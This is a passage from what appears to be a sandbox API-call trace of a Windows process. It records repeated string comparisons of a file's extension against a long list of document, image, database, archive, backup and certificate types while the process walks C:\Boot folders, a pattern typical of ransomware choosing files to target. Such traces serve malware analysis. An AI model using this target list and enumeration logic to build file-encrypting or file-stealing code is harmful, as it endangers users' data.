[0285.546] lstrlenW (lpString=".mp4") returned 4 [0285.546] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mpeg") returned 5 [0285.546] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.546] lstrlenW (lpString=".mpg") returned 4 [0285.546] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mpv") returned 4 [0285.546] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mrw") returned 4 [0285.546] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.547] lstrlenW (lpString=".msg") returned 4 [0285.547] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.547] lstrlenW (lpString=".mxl") returned 4 [0285.547] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".myd") returned 4 [0285.547] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".myi") returned 4 [0285.547] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".nef") returned 4 [0285.547] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".nrw") returned 4 [0285.547] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".obj") returned 4 [0285.547] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".odb") returned 4 [0285.547] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".odc") returned 4 [0285.547] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".odm") returned 4 [0285.547] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".odp") returned 4 [0285.547] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".ods") returned 4 [0285.547] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".oft") returned 4 [0285.547] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.547] lstrlenW (lpString=".one") returned 4 [0285.547] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".onepkg") returned 7 [0285.548] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.548] lstrlenW (lpString=".onetoc2") returned 8 [0285.548] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.548] lstrlenW (lpString=".opt") returned 4 [0285.548] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".oqy") returned 4 [0285.548] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".orf") returned 4 [0285.548] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".p12") returned 4 [0285.548] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".p7b") returned 4 [0285.548] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".p7c") returned 4 [0285.548] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".pam") returned 4 [0285.548] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".pbm") returned 4 [0285.548] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".pct") returned 4 [0285.548] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".pcx") returned 4 [0285.548] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".pdd") returned 4 [0285.548] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.548] lstrlenW (lpString=".pdf") returned 4 [0285.549] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".pdp") returned 4 [0285.549] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".pef") returned 4 [0285.549] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".pem") returned 4 [0285.549] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".pff") returned 4 [0285.549] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".pfm") returned 4 [0285.549] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".pfx") returned 4 [0285.549] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".pgm") returned 4 [0285.549] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".php") returned 4 [0285.549] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.549] lstrlenW (lpString=".php3") returned 5 [0285.549] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.549] lstrlenW (lpString=".php4") returned 5 [0285.549] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.549] lstrlenW (lpString=".php5") returned 5 [0285.549] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.549] lstrlenW (lpString=".phtml") returned 6 [0285.549] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.549] lstrlenW (lpString=".pict") returned 5 [0285.549] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.549] lstrlenW (lpString=".pl") returned 3 [0285.550] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.550] lstrlenW (lpString=".pls") returned 4 [0285.550] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".pm") returned 3 [0285.550] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.550] lstrlenW (lpString=".png") returned 4 [0285.550] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".pnm") returned 4 [0285.550] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".pot") returned 4 [0285.550] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".potm") returned 5 [0285.550] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.550] lstrlenW (lpString=".potx") returned 5 [0285.550] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.550] lstrlenW (lpString=".ppa") returned 4 [0285.550] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".ppam") returned 5 [0285.550] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.550] lstrlenW (lpString=".ppm") returned 4 [0285.550] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".pps") returned 4 [0285.550] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".ppsm") returned 5 [0285.550] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.550] lstrlenW (lpString=".ppt") returned 4 [0285.550] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.550] lstrlenW (lpString=".pptm") returned 5 [0285.551] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.551] lstrlenW (lpString=".pptx") returned 5 [0285.551] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.551] lstrlenW (lpString=".prn") returned 4 [0285.551] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".ps") returned 3 [0285.551] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.551] lstrlenW (lpString=".psb") returned 4 [0285.551] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".psd") returned 4 [0285.551] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".pst") returned 4 [0285.551] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".ptx") returned 4 [0285.551] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".pub") returned 4 [0285.551] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".pwm") returned 4 [0285.551] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".pxr") returned 4 [0285.551] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".py") returned 3 [0285.551] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.551] lstrlenW (lpString=".qt") returned 3 [0285.551] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.551] lstrlenW (lpString=".r3d") returned 4 [0285.551] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.551] lstrlenW (lpString=".raf") returned 4 [0285.552] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.552] lstrlenW (lpString=".rar") returned 4 [0285.552] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.552] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.552] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0285.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.552] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0285.552] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0285.552] lstrlenW (lpString="C:\\Boot\\fi-FI") returned 13 [0285.552] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0285.553] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.553] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.553] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.553] lstrlenW (lpString=".1cd") returned 4 [0285.553] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.553] lstrlenW (lpString=".3ds") returned 4 [0285.553] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.553] lstrlenW (lpString=".3fr") returned 4 [0285.553] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.553] lstrlenW (lpString=".3g2") returned 4 [0285.553] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.553] lstrlenW (lpString=".3gp") returned 4 [0285.553] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.553] lstrlenW (lpString=".7z") returned 3 [0285.553] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.553] lstrlenW (lpString=".accda") returned 6 [0285.553] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.553] lstrlenW (lpString=".accdb") returned 6 [0285.553] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.553] lstrlenW (lpString=".accdc") returned 6 [0285.553] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.554] lstrlenW (lpString=".accde") returned 6 [0285.554] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.554] lstrlenW (lpString=".accdt") returned 6 [0285.554] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.554] lstrlenW (lpString=".accdw") returned 6 [0285.554] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.554] lstrlenW (lpString=".adb") returned 4 [0285.554] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".adp") returned 4 [0285.554] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".ai") returned 3 [0285.554] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.554] lstrlenW (lpString=".ai3") returned 4 [0285.554] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".ai4") returned 4 [0285.554] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".ai5") returned 4 [0285.554] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".ai6") returned 4 [0285.554] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".ai7") returned 4 [0285.554] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".ai8") returned 4 [0285.554] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.554] lstrlenW (lpString=".anim") returned 5 [0285.555] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.555] lstrlenW (lpString=".arw") returned 4 [0285.555] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".as") returned 3 [0285.555] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.555] lstrlenW (lpString=".asa") returned 4 [0285.555] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".asc") returned 4 [0285.555] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".ascx") returned 5 [0285.555] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.555] lstrlenW (lpString=".asm") returned 4 [0285.555] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".asmx") returned 5 [0285.555] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.555] lstrlenW (lpString=".asp") returned 4 [0285.555] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".aspx") returned 5 [0285.555] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.555] lstrlenW (lpString=".asr") returned 4 [0285.555] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".asx") returned 4 [0285.555] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".avi") returned 4 [0285.555] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.555] lstrlenW (lpString=".avs") returned 4 [0285.555] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".backup") returned 7 [0285.556] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.556] lstrlenW (lpString=".bak") returned 4 [0285.556] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".bay") returned 4 [0285.556] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".bd") returned 3 [0285.556] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.556] lstrlenW (lpString=".bin") returned 4 [0285.556] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".bmp") returned 4 [0285.556] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".bz2") returned 4 [0285.556] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".c") returned 2 [0285.556] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.556] lstrlenW (lpString=".cdr") returned 4 [0285.556] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".cer") returned 4 [0285.556] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".cf") returned 3 [0285.556] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.556] lstrlenW (lpString=".cfc") returned 4 [0285.556] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".cfm") returned 4 [0285.556] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.556] lstrlenW (lpString=".cfml") returned 5 [0285.557] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.557] lstrlenW (lpString=".cfu") returned 4 [0285.557] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".chm") returned 4 [0285.557] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".cin") returned 4 [0285.557] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".class") returned 6 [0285.557] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.557] lstrlenW (lpString=".clx") returned 4 [0285.557] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".config") returned 7 [0285.557] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.557] lstrlenW (lpString=".cpp") returned 4 [0285.557] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".cr2") returned 4 [0285.557] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".crt") returned 4 [0285.557] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".crw") returned 4 [0285.557] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.557] lstrlenW (lpString=".cs") returned 3 [0285.557] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.557] lstrlenW (lpString=".css") returned 4 [0285.557] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".csv") returned 4 [0285.558] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".cub") returned 4 [0285.558] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dae") returned 4 [0285.558] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dat") returned 4 [0285.558] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".db") returned 3 [0285.558] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.558] lstrlenW (lpString=".dbf") returned 4 [0285.558] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dbx") returned 4 [0285.558] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dc3") returned 4 [0285.558] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dcm") returned 4 [0285.558] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dcr") returned 4 [0285.558] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".der") returned 4 [0285.558] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dib") returned 4 [0285.558] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dic") returned 4 [0285.558] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.558] lstrlenW (lpString=".dif") returned 4 [0285.558] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.559] lstrlenW (lpString=".divx") returned 5 [0285.559] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.559] lstrlenW (lpString=".djvu") returned 5 [0285.559] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.559] lstrlenW (lpString=".dng") returned 4 [0285.559] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.559] lstrlenW (lpString=".doc") returned 4 [0285.559] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.559] lstrlenW (lpString=".docm") returned 5 [0285.559] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.559] lstrlenW (lpString=".docx") returned 5 [0285.559] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.559] lstrlenW (lpString=".dot") returned 4 [0285.559] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.559] lstrlenW (lpString=".dotm") returned 5 [0285.559] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.559] lstrlenW (lpString=".dotx") returned 5 [0285.559] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.559] lstrlenW (lpString=".dpx") returned 4 [0285.559] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.559] lstrlenW (lpString=".dqy") returned 4 [0285.559] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.559] lstrlenW (lpString=".dsn") returned 4 [0285.559] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.559] lstrlenW (lpString=".dt") returned 3 [0285.559] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.559] lstrlenW (lpString=".dtd") returned 4 [0285.559] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".dwg") returned 4 [0285.560] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".dwt") returned 4 [0285.560] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".dx") returned 3 [0285.560] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.560] lstrlenW (lpString=".dxf") returned 4 [0285.560] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".edml") returned 5 [0285.560] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.560] lstrlenW (lpString=".efd") returned 4 [0285.560] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".elf") returned 4 [0285.560] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".emf") returned 4 [0285.560] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".emz") returned 4 [0285.560] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".epf") returned 4 [0285.560] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".eps") returned 4 [0285.560] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.560] lstrlenW (lpString=".epsf") returned 5 [0285.560] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.560] lstrlenW (lpString=".epsp") returned 5 [0285.560] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.560] lstrlenW (lpString=".erf") returned 4 [0285.560] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".exr") returned 4 [0285.561] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".f4v") returned 4 [0285.561] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".fido") returned 5 [0285.561] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.561] lstrlenW (lpString=".flm") returned 4 [0285.561] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".flv") returned 4 [0285.561] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".frm") returned 4 [0285.561] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".fxg") returned 4 [0285.561] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".geo") returned 4 [0285.561] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".gif") returned 4 [0285.561] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".grs") returned 4 [0285.561] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".gz") returned 3 [0285.561] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.561] lstrlenW (lpString=".h") returned 2 [0285.561] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.561] lstrlenW (lpString=".hdr") returned 4 [0285.561] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.561] lstrlenW (lpString=".hpp") returned 4 [0285.561] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".hta") returned 4 [0285.562] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".htc") returned 4 [0285.562] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".htm") returned 4 [0285.562] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".html") returned 5 [0285.562] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.562] lstrlenW (lpString=".icb") returned 4 [0285.562] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".ics") returned 4 [0285.562] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".iff") returned 4 [0285.562] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".inc") returned 4 [0285.562] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".indd") returned 5 [0285.562] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.562] lstrlenW (lpString=".ini") returned 4 [0285.562] lstrcmpiW 